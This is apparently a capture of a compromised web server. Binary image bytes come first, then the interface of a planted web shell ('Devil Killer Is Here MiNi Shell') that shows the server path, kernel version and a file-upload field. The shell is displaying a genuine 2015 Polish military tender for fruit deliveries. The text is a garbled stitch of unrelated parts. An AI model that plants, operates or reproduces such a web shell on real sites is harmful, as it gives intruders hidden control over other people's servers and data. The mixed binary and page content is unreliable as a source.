JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150831/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150831/224520-N-2015.html

<p class="kh_header"><b>Warszawa: DOSTAWA OWOCÓW GR I</b><br>
<b>Numer ogłoszenia: 224520 - 2015; data zamieszczenia: 31.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4226 , ul. Marsa 110, 04-470 Warszawa, woj. mazowieckie, tel. 22 6815 030, faks 22 6815 093.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.2rblog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Skarb Państwa, Jednostka Budżetowa-podsektor Rządowy-Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA OWOCÓW GR I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa owoców gr I.Wymogi oraz szczegółowy opis przedmiotu zamówienia wyszczególniono w załączniku nr 1 do  SIWZ.
ZADANIE NR 1
1. Banany	w ilości  270 kg	 w tym: zamówienie gwarantowane 135 kg; zamówienie opcjonalne 135 kg	
2. Cytryny	w ilości 820 kg	w tym: zamówienie gwarantowane 410 kg; zmówienie opcjonalne   410 kg	
3. Pomarańcze w ilości 240 kg	 w tym: zamówienie gwarantowane 120 kg;zamówienie opcjonalne	120 kg	
4. Mandarynki w ilości 190 kg	 w tym: zamówienie gwarantowane  95 kg; zamówienie opcjonalne 95 kg	
5. Grejpfruty w ilości 20	kg w tym: zamówienie gwarantowane 10 kg; zamówienie opcjonalne 10 kg
6. Arbuz w ilości 20 kg	w tym: zamówienie gwarantowane 10 kg; zamówienie opcjonalne	10 kg	
7. Kiwi w ilości 20 kg w tym: zamówienie gwarantowane 10	kg; zamówienie opcjonalne 10 kg
8. Morele	w ilości 120 kg, w tym: zamówienie gwarantowane  60 kg; zamówienie opcjonalne 60 kg
9. Brzoskwinie w ilości 120 kg w tym:zamówienie gwarantowane 60 kg; zamówienie opcjonalne 60 kg
10. Winogrona w ilości 130 kg	w tym: zamówienie gwarantowane 65 kg; zamówienie opcjonalne 65 kg
11. Jabłka	w ilości 5200 kg w tym:zamówienie gwarantowane  2 600 kg; zamówienie opcjonalne 2 600 kg
12. Gruszki	w ilości 450 kg w tym:zamówienie gwarantowane 225 kg; zamówienie opcjonalne 225 kg
13. Mango w ilości 10 kg w tym: zamówienie gwarantowane 5 kg; zamówienie opcjonalne 5 kg
14. Ananas	w ilości 10 kg w tym: zamówienie gwarantowane  5 kg; zamówienie opcjonalne 5 kg
15. Nektarynki w ilości 200 kg, w tym:zamówienie gwarantowane 100 kg; zamówienie opcjonalne 100 kg
ZADANIE NR 2
1. Banany	w ilości 4070 kg w tym: zamówienie gwarantowane 2 035 kg; zamówienie opcjonalne 2 035 kg
2. Cytryny	w ilości 2380 kg w tym: zamówienie gwarantowane 1 190kg; zamówienie opcjonalne 1 190 kg	
3. Pomarańcze w ilości 3370 kg w tym: zamówienie gwarantowane w ilości 1 685 kg;zmówienie opcjonalne 1 685	kg
4. Mandarynki w ilości 3220 kg w tym: zamówienie gwarantowane 1 610 kg;zamówienie opcjonalne 1 610 kg	
5. Grejpfruty w ilości 1070kg w tym: zamówienie gwarantowane 535 kg ;zamówienie opcjonalne 535 kg	
6. Arbuz w ilości 650 kg	w tym: zamówienie gwarantowane 325kg; zamówienie opcjonalne	325	kg
7. Kiwi w ilości 1220 kg w tym: zamówienie gwarantowane 610 kg; zamówienie opcjonalne	610 kg
8. Morele w ilości 760 kg w tym:zamówienie gwarantowane 380 kg;zamówienie opcjonalne 380 kg
9. Brzoskwinie w ilości 760 kg w tym: zamówienie gwarantowane 380 kg;zamówienie opcjonalne 380 kg
10. Winogrona w ilości 2850 kg, w tym:zamówienie gwarantowane 1 425 kg; zamówienie opcjonalne 1 425 kg
11. Jabłka	w ilości 12 300 kg	w tym: zamówienie gwarantowane 6 150 kg;zamówienie opcjonalne 6 150 kg
12. Gruszki	w ilości 3 670 kg	w tym: zamówienie gwarantowane1 835 kg;zamówienie opcjonalne 1 835 kg
13. Mango	w ilości 530 kg	w tym: zamówienie gwarantowane 265 kg; zamówienie opcjonalne: 265 kg	
14. Ananas	w ilości 710 kg	w tym: zamówienie gwarantowane 355 kg; zamówienie opcjonalne 355	kg
15. Nektarynki w ilości 660 kg w tym: zamówienie gwarantowane	330	kg; zamówienie opcjonalne 330kg.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.22.20.00-3, 03.22.21.11-4, 03.22.22.10-8, 03.22.22.20-1, 03.22.21.10-7, 03.22.22.30-4, 03.22.20.00-3, 03.22.21.18-3, 03.22.23.31-2, 03.22.23.32-9, 03.22.23.40-8, 03.22.23.21-9, 03.22.23.22-6, 03.22.21.13-8, 03.22.21.12-8, 03.22.23.30-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda wniesienia wadium w łącznej wysokości 11 400,00 PLN (słownie: jedenaście  tysięcy złotych 00/100), w tym na:
zadanie 1        1 400,00 PLN (słownie: jeden tysiąc czterysta złotych 00/100);
zadanie 2 -   10 000,00 PLN (słownie: dziesięć tysięcy złotych 00/100).
1.1. Wykonawca składający ofertę na wybrane zadania dokonuje wpłaty wadium w wysokości wyszczególnionej dla poszczególnych zadań (części). 
Wadium musi być wniesione przed upływem terminu składania ofert.
2. Zamawiający żąda wniesienia zabezpieczenia należytego wykonania umowy (dalej Zabezpieczenie), na pokrycie roszczeń z tytułu niewykonania lub nienależytego wykonania umowy.
2.1. Zabezpieczenie ustala się w wysokości 5 % ceny brutto podanej w ofercie.
2.2. Zabezpieczenie należytego wykonania umowy należy wnieść przed podpisaniem umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku, jeżeli: 
1.Wykonawca został dopuszczony do produkcji lub obrotu artykułami spożywczymi  - Ustawa z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności 
i żywienia - i posiada aktualną decyzję lub zaświadczenie wydane przez właściwy organ urzędowej kontroli żywności - jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2. Wykonawca posiada zgłoszoną działalność gospodarczą w zakresie produkcji, składowania, konfekcjonowania i obrotu artykułami rolno-spożywczymi, do wojewódzkiego inspektora jakości handlowej artykułów rolno-spożywczych - Ustawa 
z dnia 21 grudnia 2000 r. roku o jakości handlowej artykułów rolno-spożywczych jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania działalności, Zamawiający żąda następujących dokumentów: 
1. W przypadku, gdy ofertę składa Wykonawca, który produkuje lub wprowadza do obrotu żywność pochodzenia niezwierzęcego, zwierzęcego oraz żywność zawierającą jednocześnie środki spożywcze pochodzenia niezwierzęcego 
i produkty pochodzenia zwierzęcego do oferty należy załączyć: 
a) aktualną decyzję państwowego powiatowego inspektora sanitarnego 
o zatwierdzeniu zakładu w zakresie części zamówienia lub rodzaju żywności (grupy produktów) obejmujących przedmiot zamówienia, o której mowa w art. 61 i 62 ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia - jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
lub 
b) aktualną decyzję państwowego powiatowego inspektora weterynaryjnego 
o zatwierdzeniu zakładu w zakresie części zamówienia lub rodzaju żywności (grupy produktów) obejmujących przedmiot zamówienia, o której mowa w art. 20 ustawy 
z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego - jeżeli ustawa nakłada obowiązek posiadania takich uprawnień,
lub
c) zaświadczenie o wpisie do rejestru zakładów wydane przez organa urzędowej kontroli na podstawie art. 62 ust. 1 pkt. 4 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności  i żywienia - jeżeli ustawa nakłada obowiązek posiadania takich uprawnień.

2. W przypadku, gdy ofertę składa Wykonawca z Unii Europejskiej, spoza obszaru RP, do oferty należy załączyć aktualną decyzję wydaną przez właściwy organ danego kraju o zatwierdzeniu zakładu w zakresie części zamówienia lub rodzaju żywności (grupy produktów) obejmujących tę część zamówienia wraz z weterynaryjnym numerem identyfikacyjnym w przypadku dotyczącym żywności (grupy produktów) pochodzenia zwierzęcego.
3. W przypadku, gdy ofertę składa Wykonawca z krajów trzecich do oferty należy załączyć aktualną decyzję wydaną przez właściwy organ w danym kraju 
o dopuszczeniu zakładu do produkcji i na eksport na rynki innych krajów (w tym krajów Unii Europejskiej) w zakresie części zamówienia lub rodzaju żywności (grupy produktów) obejmujących tę część zamówienia.
4. Potwierdzenie o zgłoszeniu działalności gospodarczej w zakresie produkcji, składowania, konfekcjonowania i obrotu artykułami rolno-spożywczymi wydane przez wojewódzkiego inspektora jakości handlowej artykułów rolno-spożywczych, właściwego ze względu na miejsce zamieszkania lub siedzibę wykonawcy - na podstawie art. 12 ust. 1 stawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno-spożywczych - jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje tego warunku odstępuje od wykazania jego spełnienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje tego warunku odstępuje od wykazania jego spełnienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje tego warunku odstępuje od wykazania jego spełnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje tego warunku odstępuje od wykazania jego spełnienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Zgodnie z art. 25 ust.1, pkt.2 ustawy z dnia  29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. 2013 r., poz. 907, z późn. zm), Wykonawca winien przedłożyć oświadczenia i dokumenty potwierdzające spełnianie zgodności oferowanych dostaw z wymaganiami określonymi przez Zamawiającego, tj.:
1. Wykonawca prowadzi wewnętrzną kontrolę jakości zdrowotnej żywności i przestrzegania zasad higieny w procesie produkcji z uwzględnieniem zasad systemu HACCP - zgodnie z  art. 59 i art. 73 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia - jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.Wykonawca zaoferuje produkty odpowiadające specyfikacjom technicznym (wymaganiom)  określonym przez Zamawiającego - zgodnie z opisem przedmiotu zamówienia.  

W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, do oferty należy załączyć:
1. Zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej lub organu Inspekcji Weterynaryjnej o sprawowaniu nadzoru nad stosowaniem zasad wdrożonego sytemu HACCP, wystawione nie wcześniej niż 12 miesięcy przed upływem terminu składania ofert. Przedłożone zaświadczenie winno potwierdzać, że Wykonawca wdrożył oraz stosuje zasady systemu HACCP - podstawa prawna art. 59 i 73 ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia.
2. Oświadczenie, że oferowane produkty odpowiadają specyfikacjom technicznym (wymaganiom) określonym przez Zamawiającego w opisie przedmiotu zamówienia - wzór oświadczenia stanowi załącznik nr 6 do SIWZ.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Na podstawie art. 144 ustawy Pzp, zastrzega się możliwość dokonania zmian treści umowy 
w zakresie:
1.1.	zmiany Odbiorcy lub miejsca dostawy zgodnie ze wskazaniem właściwej instytucji wojskowej, wynikającej z potrzeb Sił Zbrojnych RP;
1.2.	 zmiany zakresu świadczenia, a tym samym ilości przewidzianych w ofercie, jednak bez zmiany wartości umowy, wynikającej z potrzeb Sił Zbrojnych RP.
2.	Wszelkie zmiany dotyczące treści umowy dokonywane będą w formie pisemnej (aneksu do umowy).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.2rblog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego, ul. Marsa 110, 04-470 Warszawa, budynek Nr 1, pokój nr 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2015 godzina 08:00, miejsce: Siedziba Zamawiającego, ul. Marsa 110, 04-470 Warszawa, kancelaria ogólna Zamawiającego - budynek  nr 3, pokój nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Zgodnie z art. 24 ust. 2a ustawy Pzp, Zamawiający wykluczy z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych, jeżeli zamawiający przewidział taką możliwość wykluczenia wykonawcy w ogłoszeniu 
o zamówieniu, w specyfikacji istotnych warunków zamówienia lub w zaproszeniu do negocjacji. Zamawiający nie wykluczy z postępowania o udzielenie zamówienia wykonawcy, który udowodni, ze podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.
2. W przypadku wykonania przedmiotu zamówienia przez podwykonawców, Wykonawca ma obowiązek najpóźniej 3 dni przed terminem podpisaniem umowy przedłożyć Zamawiającemu aktualne dokumenty podwykonawców w zakresie:
2.1. aktualną decyzję wydaną przez właściwy organ urzędowej kontroli żywności o spełnianiu wymagań koniecznych do zapewnienia higieny w procesie produkcji lub w obrocie oraz do zapewnienia właściwej jakości zdrowotnej tych artykułów - podstawa prawna art. 61, 62 ustawy z dnia 25 sierpnia o 2006 r. o bezpieczeństwie żywności i żywienia oraz art. 20 ustawy z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego - jeżeli ustawy nakładają  obowiązek posiadania takich uprawnień;
2.2.potwierdzenie o zgłoszeniu działalności gospodarczej w zakresie produkcji, składowania, konfekcjonowania i obrotu artykułami rolno-spożywczymi, wydane przez wojewódzkiego inspektora jakości handlowej artykułów rolno-spożywczych, właściwego ze względu na miejsce zamieszkania lub siedzibę wykonawcy - na podstawie art. 12 ust. 1 ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno-spożywczych - jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2.3. zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej lub organu Inspekcji Weterynaryjnej o sprawowaniu nadzoru nad stosowaniem zasad wdrożonego sytemu HACCP wystawione nie wcześniej niż 12 miesięcy przed upływem terminu składania ofert. Przedłożone zaświadczenie winno potwierdzać, że Wykonawca wdrożył oraz stosuje zasady systemu HACCP - podstawa prawna art. 59 i 73 ustawy z dnia 25 sierpnia 2006 r. 
o bezpieczeństwie żywności i żywienia - jeżeli ustawy nakładają obowiązek posiadania takich uprawnień 
3. Przed podpisaniem umowy, Wykonawca złoży pisemne oświadczenie, iż w terminie do dnia 15.12.2015 r., dostarczy polisę OC w zakresie prowadzonej działalności ważną w okresie realizacji umowy, posiadającą rozszerzony zakres ubezpieczenia od odpowiedzialności cywilnej ubezpieczonego, za szkody osobowe lub rzeczowe wyrządzone przez produkty wyprodukowane, dostarczone, sprzedane przez ubezpieczonego i spowodowane przez nie wykonanie lub nienależyte wykonanie zamówienia w okresie ubezpieczenia. Wartość polisy nie może być mniejsza niż wartość złożonej oferty. W przypadku zawierania umowy po terminie 15.12.2015r., Wykonawca dostarczy w/w polisę w dniu podpisywania umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa owoców gr I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa owoców gr I w ilościach:
1. Banany	w ilości  270 kg	 w tym: zamówienie gwarantowane 135 kg; zamówienie opcjonalne 135 kg	
2. Cytryny	w ilości 820 kg	w tym: zamówienie gwarantowane 410 kg; zmówienie opcjonalne   410 kg	
3. Pomarańcze w ilości 240 kg	 w tym: zamówienie gwarantowane 120 kg;zamówienie opcjonalne	120 kg	
4. Mandarynki w ilości 190 kg	 w tym: zamówienie gwarantowane  95 kg; zamówienie opcjonalne 95 kg	
5. Grejpfruty w ilości 20	kg w tym: zamówienie gwarantowane 10 kg; zamówienie opcjonalne 10 kg
